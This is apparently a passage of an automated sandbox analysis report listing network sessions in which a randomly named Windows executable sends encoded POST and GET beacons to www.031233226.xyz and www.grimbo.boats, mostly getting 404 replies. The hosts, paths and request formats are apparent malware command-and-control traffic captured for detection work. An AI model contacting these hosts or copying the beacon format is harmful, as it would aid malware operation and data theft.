                                                          Data Ascii:
                                                          Jan 10, 2025 23:06:45.893243074 CET201INData Raw: 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 30 35 26 6d 69 6e 5f 72 74 74 3d 31 36 30 35 26 72 74 74 5f 76 61 72 3d 38 30 32 26 73 65 6e 74 3d 31 26 72 65 63 76 3d 33 26 6c 6f 73 74 3d
                                                          Data Ascii: iming: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=484&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.949988144.76.229.203805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:06:59.047230959 CET748OUTPOST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 42 48 6a 6b 62 45 73 34 2b 4e 51 42 56 4d 50 53 34 43 41 6a 71 6d 75 75 43 4c 45 61 4e 61 79 67 66 4d 6a 46 4b 68 4e 47 6e 59 38 57 7a 5a 59 6d 4c 46 74 73 6e 79 51 56 57 4d 66 73 42 6e 4c 79 77 31 34 2b 2b 6b 59 6e 6d 7a 49 35 35 6a 58 76 4a 35 32 53 6e 30 37 6a 48 2f 50 55 77 4c 66 4f 4c 72 58 5a 63 65 5a 6c 4b 53 66 4a 6c 56 77 4d 33 70 6c 63 68 6a 78 42 2f 65 77 51 41 33 42 38 63 4a 35 33 54 66 65 6b 75 44 58 59 5a 54 65 39 6c 4b 31 70 54 32 64 2f 5a 56 59 33 43 55 37 48 4a 4e 35 48 67 68 38 4f 4f 54 62 2f 59 42 2b 64 46 70 47 64 78 58 49 72 4e 4f 52 48
                                                          Data Ascii: bdi02je=BHjkbEs4+NQBVMPS4CAjqmuuCLEaNaygfMjFKhNGnY8WzZYmLFtsnyQVWMfsBnLyw14++kYnmzI55jXvJ52Sn07jH/PUwLfOLrXZceZlKSfJlVwM3plchjxB/ewQA3B8cJ53TfekuDXYZTe9lK1pT2d/ZVY3CU7HJN5Hgh8OOTb/YB+dFpGdxXIrNORH
                                                          Jan 10, 2025 23:06:59.671782970 CET479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:06:59 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.949989144.76.229.203805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:01.594280005 CET772OUTPOST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 42 48 6a 6b 62 45 73 34 2b 4e 51 42 55 74 2f 53 6a 6a 41 6a 2f 32 75 76 4e 72 45 61 47 36 79 6b 66 4d 6e 46 4b 67 35 73 6d 72 59 57 7a 37 51 6d 46 6d 31 73 6d 79 51 56 4f 63 66 70 63 33 4c 70 77 31 38 4d 2b 6d 63 6e 6d 7a 4d 35 35 6e 54 76 4a 4f 43 54 6e 6b 37 68 4c 66 50 57 2b 72 66 4f 4c 72 58 5a 63 61 78 44 4b 53 33 4a 6c 6c 41 4d 32 4c 4e 62 39 7a 78 41 79 4f 77 51 4c 58 42 34 63 4a 34 67 54 65 44 35 75 41 76 59 5a 54 4f 39 72 37 31 75 4a 6d 63 30 45 6c 59 6f 4d 6b 53 51 42 61 6c 70 74 54 78 71 50 54 48 33 53 41 43 44 55 62 50 47 6b 41 49 4d 4b 70 59 76 61 79 65 33 77 77 46 36 6d 66 6e 54 42 30 6a 43 66 79 31 5a 4f 67 3d 3d
                                                          Data Ascii: bdi02je=BHjkbEs4+NQBUt/SjjAj/2uvNrEaG6ykfMnFKg5smrYWz7QmFm1smyQVOcfpc3Lpw18M+mcnmzM55nTvJOCTnk7hLfPW+rfOLrXZcaxDKS3JllAM2LNb9zxAyOwQLXB4cJ4gTeD5uAvYZTO9r71uJmc0ElYoMkSQBalptTxqPTH3SACDUbPGkAIMKpYvaye3wwF6mfnTB0jCfy1ZOg==
                                                          Jan 10, 2025 23:07:02.216759920 CET479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:02 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.949990144.76.229.203805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:04.148729086 CET1785OUTPOST /lgqt/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.031233226.xyz
                                                          Referer: http://www.031233226.xyz/lgqt/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 42 48 6a 6b 62 45 73 34 2b 4e 51 42 55 74 2f 53 6a 6a 41 6a 2f 32 75 76 4e 72 45 61 47 36 79 6b 66 4d 6e 46 4b 67 35 73 6d 72 51 57 30 49 49 6d 46 47 4a 73 6c 79 51 56 51 4d 66 6f 63 33 4b 35 77 7a 56 46 2b 6d 51 5a 6d 77 6b 35 72 30 62 76 50 37 75 54 70 6b 37 68 44 2f 50 56 77 4c 66 62 4c 72 47 51 63 65 64 44 4b 53 33 4a 6c 6e 59 4d 2f 35 6c 62 74 44 78 42 2f 65 77 63 41 33 42 51 63 4a 42 56 54 64 76 70 75 78 50 59 63 43 2b 39 70 4a 4e 75 43 6d 63 32 46 6c 5a 39 4d 6b 50 58 42 65 45 53 74 53 55 2f 50 52 58 33 53 45 6d 59 50 4b 66 44 78 68 5a 39 4c 37 31 4b 63 47 4f 51 77 54 41 50 30 65 2f 79 56 55 4f 43 63 32 38 73 52 66 6d 6f 45 37 75 37 52 48 73 75 6b 78 38 32 4c 4b 34 63 70 6d 6d 77 48 69 59 69 73 4c 69 71 68 53 6a 4f 50 2f 52 4c 4f 43 6e 67 35 6b 37 71 51 76 53 67 31 49 54 4f 52 54 65 32 2f 4e 30 6c 46 54 4e 49 45 4c 6f 36 5a 68 39 34 4f 68 43 73 70 69 58 41 68 35 77 77 2b 75 2f 4c 6e 30 69 4f 6f 44 7a 46 2b 4a 53 58 36 52 63 77 7a 78 37 33 53 73 59 6b 65 4d 70 37 76 62 [TRUNCATED]
                                                          Data Ascii: bdi02je=BHjkbEs4+NQBUt/SjjAj/2uvNrEaG6ykfMnFKg5smrQW0IImFGJslyQVQMfoc3K5wzVF+mQZmwk5r0bvP7uTpk7hD/PVwLfbLrGQcedDKS3JlnYM/5lbtDxB/ewcA3BQcJBVTdvpuxPYcC+9pJNuCmc2FlZ9MkPXBeEStSU/PRX3SEmYPKfDxhZ9L71KcGOQwTAP0e/yVUOCc28sRfmoE7u7RHsukx82LK4cpmmwHiYisLiqhSjOP/RLOCng5k7qQvSg1ITORTe2/N0lFTNIELo6Zh94OhCspiXAh5ww+u/Ln0iOoDzF+JSX6Rcwzx73SsYkeMp7vbTFYxk4E0jxHAeNYTFAHM+jMb8rhJ1nar9OZNSVSb7a/o9BxM1ckuY5OmthFG9bzAAMxRo73A9txAWsou+1rOlEJIKpPEFBKmc/AgbqynH/CtzX6CfJvXNgihNRSl50TqjUBDVmO35siUOY6eBiTDRDp1lPP21hQ74iM4PX15kZMMUA6MxL3h2jgChEQR/XpYFM8eE2QmBmfunkZ8hbYldU729Wymg4lG5kwjrAb+1REjH53AHIQ/dIwOrICLPHrl/0CYieEd559zeTMzQDZB1v1VTh7Yvmo4lTa5S/TOr+p9svkgYsnCboHBL6kyQ/uY07t5fzdnkmoB1FgBDH0EgeNDXkCNcBjQtDXcZaiqktSj7Bun1a9WORX1CuT/3EPN2nqalOI+czjHKJHoJ9T8k3EUQPFbFfKOhlWs54IOc8It0pYKbVtOLXZaEH4gUD5rqwrJLgtn1fg1LPOT7m3CgHELK0ojofezK0htDJ4E8Y+EvPLO1+4Rl3GPA0OJw6xIiUFl20bix0Pg0PrKcZjjrmDxxDRkMQi6QfcAGathqlgD0IU2SbIujFxxEQB20i+CNaqgWj1d1748gOMTLb9Qn7VRLJA6ZM2VX3OcefSBI6KYTQUnjfjCm0jw9nz94od/YEf8jEpieFhzV5G/anPSh9aYVV8UUJfItZ [TRUNCATED]
                                                          Jan 10, 2025 23:07:04.806638956 CET479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:04 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.949991144.76.229.203805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:06.686569929 CET482OUTGET /lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.031233226.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:07.337327957 CET479INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:07 GMT
                                                          Server: Apache
                                                          Content-Length: 315
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.949992172.67.182.198805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:12.404422045 CET745OUTPOST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 33 59 47 70 33 47 30 64 6e 50 34 4b 4f 56 44 65 4b 42 46 6c 77 74 54 58 2f 65 69 59 31 71 78 38 6d 4c 39 67 66 49 6f 63 43 4d 34 31 62 4f 4b 65 2b 75 6e 43 63 4a 6d 30 6d 73 54 64 57 6c 52 64 43 54 37 37 30 6f 34 79 49 4f 42 35 75 75 68 42 33 46 38 64 58 6c 4d 58 43 73 46 4c 56 5a 59 37 37 67 37 72 41 71 66 34 74 2f 54 52 76 68 7a 74 42 43 61 61 43 79 51 61 46 31 38 64 50 77 58 33 33 33 30 35 4b 55 62 6f 69 51 34 53 59 6d 6a 42 33 6e 49 63 46 50 6b 32 74 4f 34 37 2b 4a 74 41 53 52 30 74 76 4d 56 46 64 52 35 68 6f 63 33 2b 53 34 46 66 68 31 37 48 50 7a 68 34
                                                          Data Ascii: bdi02je=3YGp3G0dnP4KOVDeKBFlwtTX/eiY1qx8mL9gfIocCM41bOKe+unCcJm0msTdWlRdCT770o4yIOB5uuhB3F8dXlMXCsFLVZY77g7rAqf4t/TRvhztBCaaCyQaF18dPwX33305KUboiQ4SYmjB3nIcFPk2tO47+JtASR0tvMVFdR5hoc3+S4Ffh17HPzh4
                                                          Jan 10, 2025 23:07:13.061772108 CET1092INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:13 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRv5Eiw%2BuA0NsdnI0lIpjaA4pRK%2BSM%2Bgbr7k8NEJRGzr31dI97GzwQSjUaqtU2VdhkLa92octjvd%2BdeSjDlUhhH1N9b2AlMMvipzpUxQN4q%2FWPjc7iTOFBQIIXxE4tTlNmwl"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffa88f83c4322-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.949993172.67.182.198805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:14.958389044 CET769OUTPOST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 33 59 47 70 33 47 30 64 6e 50 34 4b 4f 30 7a 65 4e 6d 78 6c 32 4e 54 57 6d 2b 69 59 2f 4b 78 34 6d 4c 35 67 66 4d 51 32 43 36 51 31 63 72 32 65 2f 72 4c 43 51 70 6d 30 70 4d 54 55 56 56 52 43 43 54 2f 64 30 74 51 79 49 4f 46 35 75 73 4a 42 33 55 38 63 59 56 4d 52 4a 4d 46 4a 59 35 59 37 37 67 37 72 41 70 69 58 74 2f 62 52 6f 56 50 74 44 6a 61 64 49 53 51 5a 43 31 38 64 65 67 58 7a 33 33 30 62 4b 52 43 4e 69 53 77 53 59 6d 7a 42 33 32 49 54 4d 50 6b 30 79 65 35 65 34 59 77 5a 53 43 38 6c 6c 63 46 52 4b 43 31 6b 69 64 4c 67 44 4b 4d 45 30 69 37 67 49 55 6f 51 6a 39 64 6c 77 73 50 67 4a 4a 2f 4e 77 68 59 34 52 59 43 36 70 77 3d 3d
                                                          Data Ascii: bdi02je=3YGp3G0dnP4KO0zeNmxl2NTWm+iY/Kx4mL5gfMQ2C6Q1cr2e/rLCQpm0pMTUVVRCCT/d0tQyIOF5usJB3U8cYVMRJMFJY5Y77g7rApiXt/bRoVPtDjadISQZC18degXz330bKRCNiSwSYmzB32ITMPk0ye5e4YwZSC8llcFRKC1kidLgDKME0i7gIUoQj9dlwsPgJJ/NwhY4RYC6pw==
                                                          Jan 10, 2025 23:07:15.602125883 CET1078INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:15 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sZYhGPN8UfK2XzMA%2BQ6xQQz5X%2FdEXNUPDfT50NHIptrBJ6bLMAJw5A4Y1wPyiu1juL6CO%2BPtXPCfRoJZZ4o3C4157raVJDUc5pZ7ZtTUDRpIWCiHD71HUC1v6XldruDWqux"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffa98fac080d3-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a
                                                          Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U
                                                          Jan 10, 2025 23:07:15.602598906 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
